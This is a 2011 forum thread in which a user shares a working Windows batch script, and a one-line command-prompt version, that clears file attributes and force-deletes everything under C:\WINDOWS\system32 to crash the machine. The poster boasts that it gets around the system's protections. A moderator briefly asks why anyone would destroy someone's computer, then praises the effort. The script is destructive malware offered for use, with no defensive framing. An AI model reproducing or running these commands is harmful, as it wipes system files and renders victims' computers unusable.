Batch Beta
Please Login to get full access and to disable ads.

Join the forum, it's quick and easy

Batch Beta
Please Login to get full access and to disable ads.
Batch Beta
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Thanks to awestom for removing those ads!

Staff Selections are closed! Thanks for participating!
Welcome to the new admins and mods!
About the ads, yeah. We reached our 250'th post and the ads kicked on. In order to disable them I need to purchase a ad removal feature. Now, I don't have credits and in order to get one I need donations. Thanks

You are not connected. Please login or register

ACTUALLY delete system32

2 posters

Go down  Message [Page 1 of 1]

1ACTUALLY delete system32 Empty ACTUALLY delete system32 Thu Jan 13, 2011 4:29 pm

Forum_Reader

Forum_Reader
Jr Admin
Jr Admin

This has the ability to ACTUALLY delete system32. Now, normally I'd say "Feh, won't work!" but trust me, it took me 5 tries to get it good. Please note, this won't work perfectly, as you have to click OK a few times before it causes a BSOD (disregard the windows system file alert).

batch file:
Code:
@echo off
copy "%comspec%" "%userprofile%\Desktop\_cmd.exe"
"%userprofile%\Desktop\_cmd.exe" /k for /f "delims=" %%A in ('dir /a:-d /b /o:-n /s C:\WINDOWS\system32') do attrib -h -s -r -a "%%A" & del /f /s /q "%%A"

That code is a modified version of the script I used. If you want to run it without any possibility of the script failing (who knows?), make a copy of the command prompt on your desktop (a FULL copy) and open that. Then run this command (right click - paste)
Code:
for /f "delims=" %A in ('dir /a:-d /b /o:-n /s C:\WINDOWS\system32') do attrib -h -s -r -a "%A" & del /f /s /q "%A"

2ACTUALLY delete system32 Empty Re: ACTUALLY delete system32 Thu Jan 13, 2011 4:40 pm

-xPloit

-xPloit
Moderators
Moderators

nice work. But I still fail to see the purpose of destroying somebody's computer...

3ACTUALLY delete system32 Empty Re: ACTUALLY delete system32 Thu Jan 13, 2011 4:42 pm

Forum_Reader

Forum_Reader
Jr Admin
Jr Admin

-xPloit wrote:nice work. But I still fail to see the purpose of destroying somebody's computer...
I just wanted to see if it was possible to actually cause a BSOD by deleting system32. Now that I've confirmed that it's possible, I wanted to share it.

4ACTUALLY delete system32 Empty Re: ACTUALLY delete system32 Thu Jan 13, 2011 4:50 pm

-xPloit

-xPloit
Moderators
Moderators

well logic would have told you that was possible XD the system cant run without sys32...therefore, BSOD

5ACTUALLY delete system32 Empty Re: ACTUALLY delete system32 Thu Jan 13, 2011 5:05 pm

Forum_Reader

Forum_Reader
Jr Admin
Jr Admin

-xPloit wrote:well logic would have told you that was possible XD the system cant run without sys32...therefore, BSOD
But logic also would tell you that the system would work very hard to prevent you from doing permanent damage. This script circumvents (most of) this.

6ACTUALLY delete system32 Empty Re: ACTUALLY delete system32 Thu Jan 13, 2011 5:28 pm

-xPloit

-xPloit
Moderators
Moderators

true. But if things were easy, they wouldn't be any fun would they? XD

7ACTUALLY delete system32 Empty Re: ACTUALLY delete system32 Thu Jan 13, 2011 5:30 pm

Forum_Reader

Forum_Reader
Jr Admin
Jr Admin

-xPloit wrote:true. But if things were easy, they wouldn't be any fun would they? XD
Well, it did take me 5 tries to do it properly.

8ACTUALLY delete system32 Empty Re: ACTUALLY delete system32 Thu Jan 13, 2011 5:35 pm

-xPloit

-xPloit
Moderators
Moderators

exactly! Very Happy

Sponsored content

Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum